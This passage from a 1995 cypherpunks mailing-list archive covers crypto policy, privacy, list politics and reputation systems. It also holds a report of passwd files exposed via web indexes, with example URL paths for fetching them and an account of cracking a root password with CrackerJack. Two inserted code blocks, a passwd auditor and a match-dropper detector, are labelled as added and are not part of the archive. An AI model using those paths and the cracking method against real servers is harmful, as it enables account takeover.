     passwd files, launched CrackerJack and a 1/2 MB word file and had a 
     root password in under 30 minutes. All without accessing the site's 
     server, just the index on a web search server!
     
     Well, the first thing I did was check my site and it's ok. The second 
     thing I did was check my ISP for my home account, and it's okay. But 
     by trying various combinations of common accounts on web searches, 
     dozens of passwd files were found.
     
     It seems that a large number of locations who use httpd and ftpd on 
     the same server often copy the regular passwd file to ftp/etc or 
     ftp-users/etc for ftp user access. A few sites have left the root 
     password in the file, and many contain user accounts' passwords. The 
     problems I see here are as follows:
     
     1. You can get the passwd file in some cases by simply pointing your 
     URL to http://target.com/ftp/etc/passwd or 
     http://target.com/ftp-users/etc/passwd. Not good. Anon ftp can't get 
     it but a web browser can. Many passwd files are shadowed but you can 
     see some legit account names. Yes, I realize that this may be a dummy 
     file but hey, not always the case.
     
     2. Some sites do not have the passwd file world readable, but the 
     entire passwd file still exists indexed on the web search server. I 
     don't know about you, but I don't think I'd want my passwd file 
     indexed and searchable on a world accessible web server.
     
     3. A ton of etc/group files turned up as well.
     
     The guy that showed me this found it funny, but I find it disturbing. 
     Are there that many sites that are that poorly configured?
     
     Mark_W_Loveless@smtp.bnr.com
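
A local check for the exposure described above, added here as an example and not part of either message: it reads passwd-format text, such as a copy found under a served ftp/etc directory, and counts the entries that still carry a password hash. The function names and both sample files are constructed.

```c
#include <stdio.h>
#include <string.h>

struct audit {
    int entries;       /* well-formed passwd lines seen                 */
    int exposed;       /* entries whose password field holds a hash     */
    int exposed_uid0;  /* ...of which the account has uid 0             */
    int empty_pw;      /* entries with an empty password field          */
};

/* Locked or shadowed fields carry no crackable material: "*", "!", "x", or
   anything starting with '*' or '!' (for example "*LK*"). */
static int is_placeholder(const char *pw, size_t len)
{
    return pw[0] == '*' || pw[0] == '!' || (len == 1 && pw[0] == 'x');
}

/* Scan passwd-format text (name:passwd:uid:gid:...) without modifying it. */
struct audit audit_passwd(const char *text)
{
    struct audit a = {0, 0, 0, 0};
    const char *p = text;
    while (*p) {
        const char *eol = strchr(p, '\n');
        if (!eol) eol = p + strlen(p);
        /* locate the first three ':' separators on this line */
        const char *c1 = memchr(p, ':', (size_t)(eol - p));
        const char *c2 = c1 ? memchr(c1 + 1, ':', (size_t)(eol - c1 - 1)) : NULL;
        const char *c3 = c2 ? memchr(c2 + 1, ':', (size_t)(eol - c2 - 1)) : NULL;
        if (c3 && *p != '#') {
            size_t pwlen = (size_t)(c2 - c1 - 1);
            int uid0 = (c3 - c2 == 2 && c2[1] == '0');
            a.entries++;
            if (pwlen == 0)
                a.empty_pw++;
            else if (!is_placeholder(c1 + 1, pwlen)) {
                a.exposed++;
                a.exposed_uid0 += uid0;
            }
        }
        p = *eol ? eol + 1 : eol;
    }
    return a;
}

/* Constructed sample: a system passwd file copied into an FTP area as-is.
   The 13-character strings are made-up stand-ins, not real hashes. */
static const char COPIED[] =
    "root:AbCdEfGhIjKlM:0:0:root:/:/bin/sh\n"
    "daemon:*:1:1::/:\n"
    "ftp:*:99:99:Anonymous FTP:/home/ftp:/bin/false\n"
    "jdoe:NoPqRsTuVwXyZ:1001:100:J Doe:/home/jdoe:/bin/sh\n"
    "guest::1002:100::/home/guest:/bin/sh\n";

/* Constructed sample: a stub with every password field starred out. */
static const char STUB[] =
    "root:*:0:0:::\n"
    "ftp:*:99:99:::\n";

int main(void)
{
    struct audit c = audit_passwd(COPIED), s = audit_passwd(STUB);
    printf("copied: %d entries, %d hashes (%d uid 0), %d empty\n",
           c.entries, c.exposed, c.exposed_uid0, c.empty_pw);
    printf("stub:   %d entries, %d hashes\n", s.entries, s.exposed);
    return 0;
}
```

A nonzero hash count on any file reachable through the web or FTP root means the file should be replaced with a stub and the affected passwords changed, since a search index may already hold a copy.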
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Fri, 29 Dec 1995 05:50:17 +0800
To: cypherpunks@toad.com
Subject: (fwd) RSA CEO Bidzos on USML/ITAR
Message-ID: <199512271817.KAA16898@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


From: softwa19@us.net (Charles R. Smith)
Newsgroups: talk.politics.crypto
Date: Tue, 26 Dec 1995 16:55:09 GMT

RSA CEO/President D. James Bidzos, in a speech before the
Commonwealth Club of California, openly stated his opposition to
current USML/ITAR controls.  "We stand to lose a significant
part of our industry due to export controls", said Bidzos in the
taped address shown on C-Span 12/25/95.  The recent teaming of
Sun with ex-Soviet programmers to avoid U.S. export controls on
encryption was cited by Bidzos as an example of exactly how jobs
and opportunities are being forced off shore by U.S. policy.
Bidzos's statements echo the remarks from Microsoft CEO, Bill
Gates, who also lashed out at federal export restrictions in his
comments before the National Press Club in early December.

This author noted some months ago the teaming of Ernst & Young
and SOFTWARE (AG), a German based software firm, to provide
encryption security with no import regulations.  Foreign
companies are allowed freely to compete in the U.S. domestic
market while U.S. citizens are restricted from the international
market.  This imbalance costs American jobs, taxes, rapidly
erodes our lead in this important area of science and is unfair.
The regulations, instead of limiting access to foreign criminals
and terrorists, have led to a U.S. funded explosion of better
off-shore products that are beyond law enforcement control.  In
fact, the Federal government not only encourages this effort but
even has a multi-million dollar contract with SOFTWARE (AG).
The time for these regulations has clearly passed.  Yet, our
government is not geared for quick action, nor will self-seeking
bureaucrats ever be convinced to let go.  The world, however,
will quickly leave us behind unless we act soon.

1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith - President
SOFTWAR, Richmond VA
http://www.ultimate.org/2292/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@SmallWorks.COM (Jim Thompson)
Date: Thu, 28 Dec 1995 12:20:09 +0800
To: dklur@dttus.com
Subject: Re: Cybercash security
Message-ID: <9512271711.AA13714@hosaka.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



The thing  I'd like to understand about Cybercash is... how do I get the
cash back out of the system?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 15:39:28 +0800
To: cypherpunks@toad.com
Subject: proposal for new cyber abbreviation
Message-ID: <199512271947.LAA22943@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc.
ad nauseam. (I have reason to believe that PTB, or "powers that be" was
actually invented here on this list!!) 

anyway after reading recent messages I propose:

SHTBD!!!!

as in, Something Has To Be Done.

used either seriously or satirically (probably mostly satirically by
everyone here).

example:

"there was an editorialist on TV ranting about the 4 horsemen of the
infocalypse and screeching that SHTBD!!!"

or,

"I was not implying that SHTBD, merely that we are moving into a brave
new world in cyberspace".

or,

"those @#$%^&* online pedophiles are crawling all over the net. SHTBD!!!"

or,

"the @#%^^&* mainstream press is always pointing out new bogeymen
with the concluding moral, SHTBD!!!"


notice that SHTBD is the antithesis of cypherpunk philosophy in that
it tends to imply

1. government intervention
2. coercive force
3. censorship

etc.

hence by using this term and popularizing it, we promote our own agenda
of "cryptoanarchy".

just my small contribution to humanity for today.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 16:32:36 +0800
To: cypherpunks@toad.com
Subject: cool cpunk project proposal: "cpunk approved" logo
Message-ID: <199512271959.LAA23984@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



recently my local newspaper ran a section on privacy preservation
in cyberspace. it quoted Dave Banisar of CPSR as talking about how
future companies might have a "privacy safe" sticker affixed to them.

*wow*, what a great idea. this would be a great project for the cpunks.

most people here are familiar with Point Communications and how they
do the "top 5% of web sites" and authorize sites to use their logo.
this is such a neat idea: it's one of the first reputation rating 
companies in existence, in a sense. furthermore, it's *private*.
TCM and others have advocated that these companies are going to become 
ubiquitous (rating *everything* including hot-button things like
doctors, lawyers, hit men, etc. <g>) and I can see it happening quickly.

here's my idea that some enterprising cpunks might like to 
pursue. 

create a CYPHERPUNK PRIVACY SAFE logo and distribute it to various 
companies who adhere to the criteria that it names!!!

the steps would be:

1. create a logo
2. create a set of criteria for companies who are "privacy safe" or who
adhere to cpunk privacy guidelines. 
3. write out this list in careful detail. one might also have different
levels or grades, such as "level 5 privacy protection" etc.  one could
conceivably use it as a negative reinforcement too, handing out "F's"
to the worst companies.
4. POPULARIZE this. get companies to put the logo on their sites like
they do with the Web logo. 

now, I don't know if people here realize how much great potential this
idea has. the media just LOVES to quote these kinds of judgements when
it's a slow news day (witness Blackwell's "worst dressed" list or
"best haircuts" or whatever else).

the immediate objection I can see is that all kinds of people such as
PM will rant that there is no "official" cpunk privacy standard. great!!
I propose somebody create their OWN and call it that without any
reservations. if the cpunk name is not copyrighted, if no one owns it,
then anyone can do whatever they want with it!!! ah, that's glorious anarchy
for sure.

if multiple standards emerge, I'm sure one will tend to become dominant,
or at least the competition between them will have them covering 
different areas (such as FAQs in newsgroups work).

this idea really has FANTASTIC potential imho. in fact I propose that
Community Connection is in a really excellent position to latch onto this
idea-- they already have many press releases and the industry is watching 
them.

notice that this sticker could be used to handle the key escrow issues as
well-- like one of the levels being that the company is ideologically
opposed to mandatory key escrow or something. different levels of 
cryptography could be involved. someone will have to experiment with
perhaps multiple logos and different grades. remember, the thing should
be as absolutely obvious and easy to comprehend as possible for even
Joe Sixpack to get it.

let's create a cpunk "approval" rating that has as much recognition some
day as the "intel inside" ad campaign has generated!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 28 Dec 1995 12:20:05 +0800
To: cypherpunks@toad.com
Subject: Some IETF drafts possibly of interest
Message-ID: <9512271701.AA17855@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Internet-Drafts are available by anonymous FTP to ds.internic.net in the
directory internet-drafts.  Other places, too -- don't ask me, tho; for
questions, please mail to Internet-Drafts@cnri.reston.va.us.

The first two seem interesting even if SKIP has no future in IPng.
The last is useful because I keep pushing GSSAPI as a standard crypto
API. :)
       Title     : Encoding of an Unsigned Diffie-Hellman Public Value     
       Author(s) : A. Aziz, T. Markson, H. Prafullchandra
       Filename  : draft-ietf-ipsec-skip-udh-00.txt
       Pages     : 6
       Date      : 12/22/1995
It is useful to be able to communicate public keys in the absence of a 
certificate hierarchy and a signature infrastructure.  This document 
describes a method by which certificates which communicate Diffie-Hellman 
public values and parameters may be encoded and securely named.            

							
       Title     : Certificate Discovery Protocol                          
       Author(s) : A. Aziz, T. Markson, H. Prafullchandra
       Filename  : draft-ietf-ipsec-cdp-00.txt
       Pages     : 13
       Date      : 12/22/1995
Use of Public key cryptography is becoming widespread on the Internet in 
such applications as electronic mail and IP Security (IPSEC).  Currently, 
however, a common public key certificate infrastructure does not exist 
which is interoperable with other systems and ubiquitous.  In light of 
this, we describe a protocol which may be used to exchange or retrieve 
certificates (essentially signed public keys) with or from another entity. 
The protocol may be used to request certificates from a directory/name 
server or from the entity who owns the certificate.                        

       Title     : The Simple Public-Key GSS-API Mechanism (SPKM)          
       Author(s) : C. Adams
       Filename  : draft-ietf-cat-spkmgss-05.txt
       Pages     : 42
       Date      : 12/22/1995
This specification defines protocols, procedures, and conventions to be 
employed by peers implementing the Generic Security Service Application 
Program Interface (as specified in RFCs 1508 and 1509) when using the 
Simple Public-Key Mechanism.                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 17:11:16 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <199512271725.MAA00248@jafar.sware.com>
Message-ID: <199512272022.MAA25782@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>As Tim May has explained over and over again, "the cypherpunks" do not
>exist.  Cypherpunks is a mailing list, not a society or club.
>"The cypherpunks" as a group can do nothing about what gets posted to
>this list except comment on it.

there are various myths here that ought to be addressed. 

- if the cypherpunks are not really a group, then people wouldn't get
upset what goes under the cypherpunk name. but in fact people flame
hotly what others think is or is not a "legitimate" cypherpunk tactic
or project or whatever.

you can't have it both ways. either anyone is free to decide what a 
cypherpunk is, and no one has the right to argue with it. or, cypherpunks
are something in particular, and someone has the authority to  determine
that.

so far the "authorities" are those who have been on the list a long time.
(it is still an informal system however).  this is a reasonable system. 
but I object to the way that people such 
as PM argue in one message that "there is no such thing as the cypherpunks"
but then endlessly determine themselves what is appropriate for the list.
doesn't anyone see the inconsistency-at-best-and-hypocrisy-at-worst of this?

- it's simply not true that no one can do anything about what is posted here.
there are different ways of running a mailing list. here are some things
that would be different than what is going on right now. I'm not saying
they are better, but just remember there are alternatives:

= moderator keeps a higher profile, posts under his own name, keeps order,
determines appropriateness
= no one argues with moderator or each other about valid topics
= list can bar people who are not subscribed from posting. this would
in fact  bar "hit and run" anonymous messages. however obviously the 
current list administration favors them.
= the list charter can ask for people to submit to various practices on
the honor system, such as not using pseudonyms. cryptoanarchists who
hate the idea of trust are of course going to object to the honor system,
because "that which cannot be enforced should not be prohibited".

>Finally, it should be noted that the kind of messages you're posting
>lately are eerily reminiscent of Detweiler's mental deterioration just
>before he went off the deep end.  In fact, the line "How long will the
>cypherpunks put up with this?" may be an exact quote.

perhaps Detweiler is in fact really a pseudonym of Cohen. or maybe 
Cohen and Detweiler and all other anonymous posts are really a big
joke being played on everyone by TCM. although you may have an interesting
point there. perhaps thinking about trying to impose order on cryptoanarchists
(who themselves occasionally rant about the disorder amongst themselves, 
although never in those terms) is a sure recipe for frustration insanity. 

caveat emptor!!

(the list, as it is currently set up, is highly vulnerable to agents 
provocateur.  cryptoanarchists should realize that the same "disorders"
 (oh, sorry, "freedoms") such as completely unrestrained anonymous posting,
 no "official" moderation etc.  they favor can be used very 
effectively against them when an intelligent and 
mischievous adversary so chooses or is provoked to do so. there 
have been visceral demonstrations of this on occasion here <g>)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Dec 1995 13:16:30 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <9512271343.AA13409@all.net>
Message-ID: <199512271725.MAA00248@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cohen writes:
> 
> We just heard from another anonymous poster trying to destroy our rights
> to free speech.  How long will the cypherpunks put up with this?

As Tim May has explained over and over again, "the cypherpunks" do not
exist.  Cypherpunks is a mailing list, not a society or club.
"The cypherpunks" as a group can do nothing about what gets posted to
this list except comment on it.

BTW, it would be helpful if you would provide some context when you 
complain or comment about another posting.  At the time I read your note,
it was the only cypherpunks note in my mailbox.  Perhaps I read some
message earlier from the ECafe anonymous mailer but if so, it certainly
wasn't remarkable enough to leave a lasting impression.

Finally, it should be noted that the kind of messages you're posting
lately are eerily reminiscent of Detweiler's mental deterioration just
before he went off the deep end.  In fact, the line "How long will the
cypherpunks put up with this?" may be an exact quote.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Dec 1995 18:47:32 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews and Alta Vista Search Tools, and Privacy Implications
Message-ID: <199512272027.MAA18633@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:28 AM 12/27/95 -0800, tcmay@got.net (Timothy C. May) wrote:
>Anyway, a point of clarification of a point, lest there be the belief that
>_all_ Cypherpunks are opposed to comprehensive Web search tools:
......
...offshore...
......
>Face it, every single word written by any of us to any Usenet newsgroup,
>going back to the beginning of Usenet, and expanding out to many
>ostensibly-private mailing lists, will fairly soon be searchable. 

The Internet not only makes it easier for everybody to get their
15 minutes of fame, it guarantees that anything stupid you've said 
in public over the last 15 years will be available to the entire world.
So deal with it...  I'm more bothered by people indexing what I read.

What kinds of Cypherpunk technology can we use to affect this?
I don't think we need to do too much work on _increasing_ data collection;
the commercial markets will figure that one out fast enough,
though understanding technical possibilities enough to stay ahead is good.
Remailers and nymservers are obvious starts on the information-hiding end,
and even the basic non-encrypted cypherpunks remailers are good enough
for most applications.  The problem is getting them widely deployed.
I've seen a couple of web-page-based remailers, and they're probably
easy to deploy widely; they're not very secure without SSL, but they're
a start, and people on SSL-equipped systems can run them securely.
Anon web proxies are more work to deploy, but they're not mysterious,
and the main limits to deploying them are economics.

Nymservers, however, are still pretty new - technology like anon.penet.fi
is generally good enough for most people if you've got an operator you trust,
and an economic base that makes it worth running them.  But the more secure
nymservers are still complex, and probably not something the average hacker
can just pop up and run - we probably need to explore them more before
it'll be easy to do.

While I like getting services provided through community spirit, like most of 
the remailers, I suspect Tim's right that pay-per-use privacy services
are going to evolve, and probably dominate.  Among other things, they're in
the balance between the couch-potato on-line services and real Internet
connections; they're probably more likely to be offered by people who want
full-time connectivity, and will be used to offset the slightly higher costs
of real service.  However, partly due to patent issues, and partly just to
convenience, I don't think they all need to use fully-anonymous digicash
for every transaction; most of them can get by with service-provider tokens 
that may be paid for by digicash or by less-anonymous systems.

One of the main threats I see to privacy services is the Exon bill -
it's pretty obvious that most US service providers will have to limit
access to people over 18, in spite of any of the Good Senator's claims
otherwise.
If the Feds start making examples of people before any serious court cases
get decided (or after, if the good guys lose), that probably means 
that service providers will have to check ID to protect themselves.
There may be a market for services that validate that their customers
are over 18, but provide anonymity within that.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Thu, 28 Dec 1995 18:45:32 +0800
To: cypherpunks@toad.com
Subject: Reputation capital: FIBS case study
Message-ID: <2sY4wMz2BcRC083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I am currently engaging in a reputation adjustment of a certain player
on FIBS, the First Internet Backgammon Server (see my homepage).
Reputation is important on FIBS, and I thought it might be informative
to examine the ways it can work in the [more-or-less] real world.

FIBS allows various levels of nymity, and various modes of reputation.

Each player picks a pseudonym as his FIBS name.  These can range from
the cryptically anonymous nym, to some variant of the player's real name.
The server will also disclose the FQDN from which the nym is connected,
or was most recently connected.  If she wants, the player may include
any information, typically such as an email address, in an "address"
field in her player profile.  Or something cute, or nothing.  Players
may also choose to have a web page listed under their nym, on a page
full of such listings.  Players may participate in the newsgroup
(rec.games.backgammon), identifying themselves in their posts by 
any or all or none of {their FIBS nym, their real name, their email
address}.

Reputation has several components on FIBS.  Of course, personal 
experience with another nym is hugely significant, when it exists.
When that is absent, or not conclusive, there are other sources of
reputation which may be consulted.  The server reports two
numbers for each player, representing distinct reputation criteria:
the "rating" is a weighted score representing the won/lost record;
the "experience" is a count representing how many games this player has
played.  Before I mention other reputation indices, I want to amplify
on these two.  When negotiating with another player about possibly
starting a new match, and about the length in points of the potential
match, most players will think about various aspects of the reputation
of the prospective opponent.  Depending on the circumstances, the
difference in ratings may be decisive, in straightforward ways, for
evaluating an invitation.  Of particular relevance to past discussion
on cypherpunks, the experience number is usually very important also.
Those with a high experience level, and perhaps a name that you recall
having seen before, are trusted more than nyms with little investment
in their reputations.  Experience matters a lot, because one of the
key strategies is to avoid becoming involved with unpleasant or 
dishonest players.  If someone has a huge experience number, you can
be fairly sure that you would have heard about it if they are somehow
undesirable.  

As FIBS is an open server, operating without charge to the users,
we get a wide variety of newcomers every day.  Some persist, and
become better known, and others lose interest and don't return.
Most are [more-or-less] agreeable and [more-or-less] ethical; however
some nyms will exhibit certain recurring problem behaviors, and quickly
begin to accrue negative reputation.  One common problem is the use of
profanity or the advocacy of various forms of bigotry, in "shout"ed 
comments or private messages, and the closely related hounding of 
players with female-sounding nyms by unwanted come-ons.  This behavior
is generally countered with "shout"ed and "tell"ed replies, and with
the "gag <name>" command which kills your copy of any further remarks 
from that user.  The negative reputation resulting from this behavior 
is pretty much instantaneous and self-documenting, with reinforcement 
from anyone who is enraged enough to remember and to heckle the offender 
at a later login.  Some of us are more sensitive about this than others,
so the offensiveness is just another variable in reputation, not always
the decisive one.

The thorniest problem in our reputation economy continues to be the
case of the player who drops out of a match when clearly losing, to avoid
the decrement of his rating number (based on match results only, not on
individual games).  Such players follow a strategy of playing winning
matches to completion, which increases their rating, but bailing out of
losing matches before they end.  When a match is interrupted, the server
remembers it, and the two players can resume later, by mutual agreement.
Almost all players are ethical enough to resume even losing matches, and
eventually to complete them.  The problem folks are the ones who ignore
or refuse requests to resume.  Avoiding such players is a key strategy
for serious FIBS regulars.  One indicator here can be a complex function
of the rating and experience numbers: a player with fairly low experience
but an unexpectedly high rating is one of two things -- either a very
strong player, or else a match dropper.  (Or else very lucky, but we
prefer to think of that as strength of play.)  The best defense we have
found against the match dropper is complaining in the newsgroup.

I just posted a warning in the newsgroup about a new match dropper which
I had the misfortune of playing against.  I accepted an invitation from
him last Saturday, to play a 3 point match.  I looked over his info
before I accepted, and decided to give him a chance: no email address,
experience = 57, and rating showing slightly more wins than losses, from
a site at a college in Britain.  I won the first game for 2 points, and
was pretty clearly winning the next game, which would make me win the match.
When "dorion" rolled a game-losing double five, he immediately dropped
his connection to FIBS.  The server saved the match, and I waited around
for awhile to see if he would come back.  He didn't.  Now at this point,
I'm not yet ready to start in on his reputation.  After all, we all have
host problems, and phone problems, and personal problems.  It's still 
possible that he and I will meet later, and finish the match.  (I'm 
skeptical, because the timing of it is just too convenient, but I hold
my tongue).  Finally Tuesday, I was hanging on FIBS when dorion returned.
I asked politely if we could finish, but dorion immediately logged out
without replying.  I stayed connected to FIBS, while I did some other 
work on other VC-s.  

Before long, dorion was back, my little watchdog macro beeped for me, 
and I again politely asked him to resume.  Instead of replying, 
he started a fresh match vs. a brand new player, experience
equal zero.  I started watching their match, where I asked again if
we could resume sometime.  While I wasn't getting an answer, I looked 
into the new player's information: connected from exactly the same
site as dorion!  This of course, is a warning sign of the other common
form of ratings cheating -- creating two nyms for one person, and 
playing against oneself, with one nym always winning and the other
always losing.  Well, again I got no reply to my requests, and both
nyms suddenly disconnected without finishing their match.

At this point, I set about trashing dorion's reputation.  I posted
a (PGP signed) article to the newsgroup setting forth the facts.
When I came back on today, there was one followup from another player
who had a similar experience with dorion.  When I signed onto FIBS,
I got a "tell" from a trusted, veteran nym saying that dorion and his
alter-ego nym BatesMotel had just been on, and played a couple of 
one-sided and not at all credible matches vs. each other.  I checked
their ratings/experience and followed up to my own article with a
definite advisory against playing against either nym.

Now, despite many elaborate proposals over the years, discussed at length
in the newsgroup, there is no automated mechanism for dealing with this
sort of negative reputation.  I have a personal "don't-play" list I keep
up to date, as do many others.  My complaint surely got dorion and
BatesMotel into many such personal lists, and neither nym is likely to
last on FIBS.  

I'm not really asking for suggestions here or anything.  It's likely that
most of them have already been debated to death on r.g.b.  I just wanted
to show you a case of reputation markets in action.

::::::::::::::::::::::::::::::::::::::    Thank you VERY much!  You'll be 
::  Lou Poppler <lwp@mail.msen.com> ::   getting a Handsome Simulfax Copy 
::      http://www.msen.com/~lwp/   ::   of your OWN words in the mail
::::::::::::::::::::::::::::::::::::::   soon (and My Reply).
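
Added example, not part of the original post and not FIBS code: a sketch of the two signals the message above walks through, flagging a nym that refuses to resume losing matches against several opponents and a pair of same-host nyms whose finished matches all go one way. The record layout, nym and host names, and both thresholds are assumptions; the sample data is constructed.

```python
from collections import defaultdict

# Constructed sample records (not real FIBS data). One dict per match:
# players, connecting hosts, winner (None = saved and unfinished), who was
# behind when it was saved, and whether that player refused to resume.
MATCHES = [
    {"players": ("nym_d", "nym_l"), "hosts": ("cs.college.example", "isp.example"),
     "winner": None, "behind": "nym_d", "refused_resume": True},
    {"players": ("nym_d", "nym_v"), "hosts": ("cs.college.example", "net.example"),
     "winner": None, "behind": "nym_d", "refused_resume": True},
    {"players": ("nym_d", "nym_b"), "hosts": ("cs.college.example", "cs.college.example"),
     "winner": "nym_d", "behind": None, "refused_resume": False},
    {"players": ("nym_d", "nym_b"), "hosts": ("cs.college.example", "cs.college.example"),
     "winner": "nym_d", "behind": None, "refused_resume": False},
    # Two different people in the same lab who split their results.
    {"players": ("nym_x", "nym_y"), "hosts": ("lab.example", "lab.example"),
     "winner": "nym_x", "behind": None, "refused_resume": False},
    {"players": ("nym_x", "nym_y"), "hosts": ("lab.example", "lab.example"),
     "winner": "nym_y", "behind": None, "refused_resume": False},
    # An ordinary dropped line: saved while behind, but resume was not refused.
    {"players": ("nym_l", "nym_v"), "hosts": ("isp.example", "net.example"),
     "winner": None, "behind": "nym_v", "refused_resume": False},
]


def unresumed_drops(matches):
    """Map nym -> opponents whose saved match the nym was losing and refused to resume."""
    drops = defaultdict(set)
    for m in matches:
        if m["winner"] is None and m["refused_resume"]:
            loser = m["behind"]
            opponent = next(p for p in m["players"] if p != loser)
            drops[loser].add(opponent)
    return drops


def one_sided_same_host(matches, min_matches=2):
    """Pairs of nyms connecting from one host whose finished matches all had the same winner."""
    wins = defaultdict(lambda: defaultdict(int))
    for m in matches:
        host_a, host_b = m["hosts"]
        if m["winner"] is None or host_a != host_b:
            continue
        wins[frozenset(m["players"])][m["winner"]] += 1
    return sorted(
        tuple(sorted(pair))
        for pair, tally in wins.items()
        if len(tally) == 1 and sum(tally.values()) >= min_matches
    )


def advisories(matches, min_reports=2):
    """Build a don't-play list: nym -> reasons.

    min_reports (assumed threshold) requires independent reports from
    distinct opponents, so a single host or phone problem flags nobody.
    """
    flags = defaultdict(list)
    for nym, opponents in unresumed_drops(matches).items():
        if len(opponents) >= min_reports:
            flags[nym].append(
                "refused to resume losing matches against: " + ", ".join(sorted(opponents))
            )
    for a, b in one_sided_same_host(matches):
        flags[a].append("one-sided same-host matches with " + b)
        flags[b].append("one-sided same-host matches with " + a)
    return dict(flags)


if __name__ == "__main__":
    for nym, reasons in sorted(advisories(MATCHES).items()):
        print(nym, "->", "; ".join(reasons))
```

A shared host alone flags nobody here: the lab pair that trades wins stays off the list, as does the player whose dropped match was not followed by a refusal to resume.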




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Thu, 28 Dec 1995 20:45:27 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE
Message-ID: <199512271221.NAA06057@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


: At 01:12 PM 12/26/95 -0800, sameer wrote:
: > The Apache-SSL Commerce webserver is the only commercial encrypting
: > webserver with source available. Ian Goldberg, graduate student at
: > U.C. Berkeley, well-known for his work on SSL security, commented on
: > the importance of available source,


ftp://ftp.hacktic.nl/pub/replay/pub/apache/

  -AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 28 Dec 1995 18:28:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews and Alta Vista Search Tools, and Privacy Implications
In-Reply-To: <ad065486000210045fdd@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951227134730.9098H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



[Re: regulating dossiers et al.]

I'm sure that Phil Hallam-Baker has brought this up before, but there is 
a fair body of law on this subject internationally. Probably the most 
restrictive is the UK Data Protection Act which regulates
 storage of personal information on computers (but not on paper). The 
DPA has a lot of holes, and seems to be honoured more in the breach than 
in the observance; other European countries have similar requirements. 

Of course, the UK has no FOIA, and won't until after the next election, 
so the most interesting databases aren't available.

Simon
-----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Dec 1995 15:54:14 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Some IETF drafts possibly of interest
In-Reply-To: <9512271701.AA17855@sulphur.osf.org>
Message-ID: <199512271913.OAA06367@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> The first two seem interesting even if SKIP has no future in IPng.

That's why the group pushed Ashar to split his document up (at the
IETF meeting in Dallas earlier this month).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Dec 1995 03:04:04 +0800
To: cypherpunks@toad.com
Subject: DOP_lip
Message-ID: <199512271913.OAA21386@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-27-95. WashP:

   The CIA's close-rankled directorate of operations aim to
   trashtalk Deutch out of depensioning the veteran Paris CoS
   for French economic spay of pigs.

   DOP_lip







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Dec 1995 20:45:32 +0800
To: cypherpunks@toad.com
Subject: GEY_ser
Message-ID: <199512271915.OAA21557@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-27-95. W$Jug:


   A test of superfast cable modems at Boston College prove
   addictive to speed freak faculty and students downloading
   junk data in seconds not minutes and hours, thus
   accelerating mind-rupture.

   And, an editorial red flags the telecom billions giveaway;
   nags Republicans to shut the geyser and not-reg the I-Way.


   GEY_ser






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Dec 1995 20:11:02 +0800
